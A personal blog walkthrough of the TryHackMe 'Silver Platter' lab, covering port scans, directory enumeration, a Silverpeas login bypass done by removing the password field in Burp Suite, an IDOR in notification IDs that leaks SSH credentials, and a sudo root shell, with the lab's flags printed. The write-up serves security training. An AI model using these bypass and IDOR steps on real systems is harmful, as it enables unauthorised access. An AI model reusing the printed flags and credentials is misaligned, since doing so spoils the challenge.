tryhackme silver platter writeup

Silver Platter TryHackMe Walkthrough

wellcome to silver platter tryhackme challange.

step 1 – gathering information

first of I use rustscan for scanning network because its much faster , then I use nmap for futher detailed scanning

rustscan -a 10.10.151.9

result

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack
80/tcp   open  http       syn-ack
8080/tcp open  http-proxy syn-ack

nmap scan

nmap -sV -vvv -p22,80,8080 10.10.151.9

result

PORT     STATE SERVICE    REASON  VERSION
22/tcp   open  ssh        syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http       syn-ack nginx 1.18.0 (Ubuntu)
8080/tcp open  http-proxy syn-ack

Gather further information From :Port 80

first i gonna just visit the website , analysing the website what are the technologies used in this websites using wappalyzer.

Silver Platter TryHackMe Walkthrough

i was checked source code of the website , i didnt see nothing phishy, so i read the website contents, that lead to further progress

Silver Platter TryHackMe website

i going to read Intro , work, about , contact

i found one of the user name in contact page , maybe its help in future

Silver Platter TryHackMe Walkthrough

i found user name : scr1ptkiddy

Hidden directory enumeration

ffuf -u http://10.10.151.9/FUZZ -w /home/ducky/wordlists/SecLists/Discovery/Web-Content/common.txt

i dont get anything from this

so lets got to Port 8080

http://10.10.151.9:8080/

when i access this i got 404 – Not Found

lets hidden directory enumeration for port 8080

gobuster dir -u http://10.10.151.9:8080/ -w /home/ducky/wordlists/SecLists/Discovery/Web-Content/common.txt

gobuster result

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.151.9:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/ducky/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/console              (Status: 302) [Size: 0] [--> /noredirect.html]
/website              (Status: 302) [Size: 0] [--> http://10.10.151.9:8080/website/]
Progress: 4746 / 4747 (99.98%)
===============================================================
Finished
===============================================================

after i just visit /console its redirect one of html page , but that html file not contain anything

so i open /website

http://10.10.151.9:8080/website/

i got just Forbidden , so i again enumerate this with gobuster

gobuster dir -u http://10.10.151.9:8080/website/ -w /home/ducky/wordlists/SecLists/Discovery/Web-Content/common.txt

i got nothing from this scan

we see earlier in contact page

Contact
If you'd like to get in touch with us, please reach out to our project manager on Silverpeas. His username is "scr1ptkiddy".

so lets try /silverpeas 

http://10.10.151.9:8080/silverpeas

yes , i got login page

Silver Platter TryHackMe login page

ok , next i am going to intercept this request in burp suite , just i going to analyze how login page behave

user name we already know , “scr1ptkiddy

Login=scr1ptkiddy&Password=pass&DomainId=0

just remove password from burp intercepts

Silver Platter TryHackMe Walkthrough

when go noitification section, we can see like this

Silver Platter TryHackMe notification

when click that notification , its open a new tab

Silver paltter idor

when change the ID=7 , change this and analyze the behaviour , ya it’s have idor vulnerability

Silver Platter TryHackMe Walkthrough

after that when i open that message,

Dude how do you always forget the SSH password? Use a password manager and quit using your silly sticky notes. 

Username: tim

Password: cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol

oh , ya we got ssh username and password , lets login shh service

ssh tim@10.10.151.9

then enter that password

tim@silver-platter:~$ ls
user.txt
tim@silver-platter:~$ cat user.txt
THM{c4ca4238a0b923820dcc509a6f75849b}
tim@silver-platter:~$ 

next we need to privilege escalation , in this step we just analyze logs

Silver Platter TryHackMe privilage escalation
tyler@silver-platter:/home$ id
uid=1000(tyler) gid=1000(tyler) groups=1000(tyler),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)
tyler@silver-platter:~$ sudo -l
[sudo] password for tyler: 
Matching Defaults entries for tyler on silver-platter:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User tyler may run the following commands on silver-platter:
    (ALL : ALL) ALL
tyler@silver-platter:~$ sudo /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
THM{098f6bcd4621d373cade4e832627b4f6}

thank you for reading this blog

Leave a Comment

Your email address will not be published. Required fields are marked *